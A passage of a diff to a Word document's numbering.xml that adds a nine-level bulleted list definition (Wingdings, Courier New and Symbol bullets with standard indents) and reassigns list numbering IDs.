xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="26F66685"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9788BED8"/>
+    <w:lvl w:ilvl="0" w:tplc="0546B5EC">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="586560C7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8B6AE928"/>
@@ -693,6 +1153,9 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
